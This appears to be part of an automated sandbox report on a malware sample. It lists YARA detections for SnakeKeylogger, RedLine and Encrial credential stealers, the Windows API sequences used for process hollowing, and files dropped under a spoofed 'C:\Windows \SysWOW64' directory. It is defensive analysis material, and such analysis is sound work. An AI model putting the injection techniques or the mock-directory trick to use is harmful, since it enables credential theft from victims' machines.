Source: 7.2.fpnevlzQ.pif.30630000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.PWSW6GK3ZC.exe.211aa5b8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.2.fpnevlzQ.pif.21e90000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.fpnevlzQ.pif.21e90000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.fpnevlzQ.pif.21e90000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.fpnevlzQ.pif.21f70000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.fpnevlzQ.pif.21f70000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.fpnevlzQ.pif.21f70000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.fpnevlzQ.pif.1f830f20.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.fpnevlzQ.pif.1f830f20.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.fpnevlzQ.pif.1f830f20.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.fpnevlzQ.pif.30630f20.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.fpnevlzQ.pif.30630f20.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.fpnevlzQ.pif.30630f20.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.fpnevlzQ.pif.30630000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.fpnevlzQ.pif.30630000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.fpnevlzQ.pif.30630000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.fpnevlzQ.pif.1f830f20.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.fpnevlzQ.pif.1f830f20.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.fpnevlzQ.pif.21f70000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.fpnevlzQ.pif.1f830f20.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.fpnevlzQ.pif.21f70000.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.fpnevlzQ.pif.21f70000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.fpnevlzQ.pif.21740f20.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.fpnevlzQ.pif.21740f20.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.fpnevlzQ.pif.21740f20.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.3.fpnevlzQ.pif.1d29f158.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.3.fpnevlzQ.pif.1d29f158.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.3.fpnevlzQ.pif.1d29f158.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.fpnevlzQ.pif.1eeb11e6.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.fpnevlzQ.pif.1eeb11e6.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.fpnevlzQ.pif.1eeb11e6.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.fpnevlzQ.pif.30cc0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.fpnevlzQ.pif.30cc0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.fpnevlzQ.pif.30cc0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.fpnevlzQ.pif.21e90000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.fpnevlzQ.pif.21e90000.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.fpnevlzQ.pif.21740f20.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.fpnevlzQ.pif.21e90000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.fpnevlzQ.pif.21740f20.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.fpnevlzQ.pif.21740f20.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000007.00000002.3358783454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000D.00000002.3358705276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000A.00000002.3381513831.000000001F500000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000007.00000002.3386753422.000000002DE20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000001.2117355938.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000A.00000003.2241933938.000000001D925000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000D.00000003.2350567700.000000001D29F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000D.00000001.2319835034.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000007.00000003.2137425995.000000002C39F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.3358753276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000D.00000002.3379158943.000000001EE70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000001.2236001285.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: Process Memory Space: fpnevlzQ.pif PID: 7100, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: fpnevlzQ.pif PID: 1440, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: fpnevlzQ.pif PID: 4536, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028B42A8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_028B42A8
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028B33F8 NtWriteVirtualMemory,	0_2_028B33F8
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028B30AC NtAllocateVirtualMemory,	0_2_028B30AC
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028B96E4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_028B96E4
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028B9600 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_028B9600
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028B9578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_028B9578
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028B3BBC NtUnmapViewOfSection,	0_2_028B3BBC
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028B394C NtReadVirtualMemory,	0_2_028B394C
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028B42A6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_028B42A6
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028B30AA NtAllocateVirtualMemory,	0_2_028B30AA
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028B9524 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_028B9524
Source: C:\Users\Public\ndpha.pif	Code function: 8_2_00725CF1 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError,	8_2_00725CF1
Source: C:\Users\Public\ndpha.pif	Code function: 8_2_007240B1 NtQuerySystemInformation,	8_2_007240B1
Source: C:\Users\Public\ndpha.pif	Code function: 8_2_00725D6A NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose,	8_2_00725D6A
Source: C:\Users\Public\ndpha.pif	Code function: 8_2_00724136 HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,DestroyWindow,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess,	8_2_00724136
Source: C:\Users\Public\ndpha.pif	Code function: 8_2_00725911 PathIsRelativeW,RtlSetSearchPathMode,SearchPathW,GetFileAttributesW,CreateActCtxW,CreateActCtxWWorker,CreateActCtxW,CreateActCtxW,GetModuleHandleW,CreateActCtxW,ActivateActCtx,SetWindowLongW,GetWindowLongW,GetWindow,memset,GetClassNameW,CompareStringW,GetWindow,GetWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,	8_2_00725911
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Code function: 9_2_02AD42A8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	9_2_02AD42A8
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Code function: 9_2_02AD3BBC NtUnmapViewOfSection,	9_2_02AD3BBC
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Code function: 9_2_02AD33F8 NtWriteVirtualMemory,	9_2_02AD33F8
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Code function: 9_2_02AD30AC NtAllocateVirtualMemory,	9_2_02AD30AC
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Code function: 9_2_02AD394C NtReadVirtualMemory,	9_2_02AD394C
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Code function: 9_2_02AD96E4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	9_2_02AD96E4
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Code function: 9_2_02AD42A6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	9_2_02AD42A6
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Code function: 9_2_02AD30AA NtAllocateVirtualMemory,	9_2_02AD30AA
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Code function: 9_2_02AD39E6 NtReadVirtualMemory,	9_2_02AD39E6
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Code function: 9_2_02AD9600 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	9_2_02AD9600
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Code function: 9_2_02AD3493 NtWriteVirtualMemory,	9_2_02AD3493
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Code function: 9_2_02AD3C48 NtUnmapViewOfSection,	9_2_02AD3C48
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Code function: 9_2_02AD9524 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	9_2_02AD9524
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Code function: 9_2_02AD9578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	9_2_02AD9578

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe

Code function: 0_2_028BAF34 InetIsOffline,Sleep,Sleep,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,

0_2_028BAF34

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	File created: C:\Windows \SysWOW64\svchost.pif	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	File created: C:\Windows \SysWOW64\NETUTILS.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows \SysWOW64	Jump to behavior

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe

File deleted: C:\Windows \SysWOW64\svchost.pif

Jump to behavior

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028A20B4	0_2_028A20B4
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028ACECD	0_2_028ACECD
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028ACFC6	0_2_028ACFC6
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_00408C60	7_2_00408C60
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_0040DC11	7_2_0040DC11
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_00407C3F	7_2_00407C3F
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_00418CCC	7_2_00418CCC
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_00406CA0	7_2_00406CA0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_004028B0	7_2_004028B0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_0041A4BE	7_2_0041A4BE
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_00418244	7_2_00418244
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_00401650	7_2_00401650
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_00402F20	7_2_00402F20
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_004193C4	7_2_004193C4
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_00418788	7_2_00418788
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_00402F89	7_2_00402F89
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_00402B90	7_2_00402B90
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_004073A0	7_2_004073A0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_2DD4CC58	7_2_2DD4CC58
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_2DD4CF30	7_2_2DD4CF30
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_2DD42EF8	7_2_2DD42EF8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_2DD4EEE0	7_2_2DD4EEE0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_2DD46EA8	7_2_2DD46EA8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_2DD4C980	7_2_2DD4C980
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_2DD469A8	7_2_2DD469A8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_2DD45857	7_2_2DD45857
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_2DD4A598	7_2_2DD4A598
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_2DD474E0	7_2_2DD474E0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_2DD4C4E0	7_2_2DD4C4E0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_2DD4D4EA	7_2_2DD4D4EA
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_2DD4D7B8	7_2_2DD4D7B8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_2DD4D20A	7_2_2DD4D20A
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_2DD4EED2	7_2_2DD4EED2
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_2DD4C6A8	7_2_2DD4C6A8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_2DD44311	7_2_2DD44311
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DACDF0	7_2_31DACDF0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DA5168	7_2_31DA5168
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DA9D68	7_2_31DA9D68
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DA9478	7_2_31DA9478
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DA1860	7_2_31DA1860
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DA1FB8	7_2_31DA1FB8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DA2AA8	7_2_31DA2AA8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DA89D5	7_2_31DA89D5
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DACDE0	7_2_31DACDE0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DA5159	7_2_31DA5159
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DAF951	7_2_31DAF951
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DAF960	7_2_31DAF960
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DAF508	7_2_31DAF508
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DA8CD0	7_2_31DA8CD0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DAF4F7	7_2_31DAF4F7
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DA8CE0	7_2_31DA8CE0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DAF0B0	7_2_31DAF0B0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DAF0A0	7_2_31DAF0A0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DAEC58	7_2_31DAEC58
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DA1850	7_2_31DA1850
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DAC849	7_2_31DAC849
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DAEC49	7_2_31DAEC49
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DA0040	7_2_31DA0040
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DA0011	7_2_31DA0011
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DAE800	7_2_31DAE800
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DAE7F0	7_2_31DAE7F0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DAE399	7_2_31DAE399
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DAE3A8	7_2_31DAE3A8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DA1FA8	7_2_31DA1FA8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DADF50	7_2_31DADF50
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DADF3F	7_2_31DADF3F
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DA0B30	7_2_31DA0B30
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DA0B20	7_2_31DA0B20
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DADAF8	7_2_31DADAF8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DADAE8	7_2_31DADAE8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DA9698	7_2_31DA9698
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DAD690	7_2_31DAD690
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DAD6A0	7_2_31DAD6A0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DA2AA0	7_2_31DA2AA0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DAD248	7_2_31DAD248
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31DAD239	7_2_31DAD239
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F911A0	7_2_31F911A0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F938B8	7_2_31F938B8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F99420	7_2_31F99420
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F97FE0	7_2_31F97FE0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F9D358	7_2_31F9D358
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F98640	7_2_31F98640
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F915F8	7_2_31F915F8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F915E9	7_2_31F915E9
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F9A9C8	7_2_31F9A9C8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F9E5B8	7_2_31F9E5B8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F985B8	7_2_31F985B8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F9A9B7	7_2_31F9A9B7
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F9E5A9	7_2_31F9E5A9
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F91190	7_2_31F91190
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F9C590	7_2_31F9C590
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F9C580	7_2_31F9C580
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F99958	7_2_31F99958
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F90D48	7_2_31F90D48
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F90D39	7_2_31F90D39
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F9E120	7_2_31F9E120
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F9E111	7_2_31F9E111
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F93D10	7_2_31F93D10
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F9C0F8	7_2_31F9C0F8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F93CFF	7_2_31F93CFF
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F9A4F1	7_2_31F9A4F1
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F908F0	7_2_31F908F0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F9C0E9	7_2_31F9C0E9
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F968E8	7_2_31F968E8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_31F968D8	7_2_31F968D8
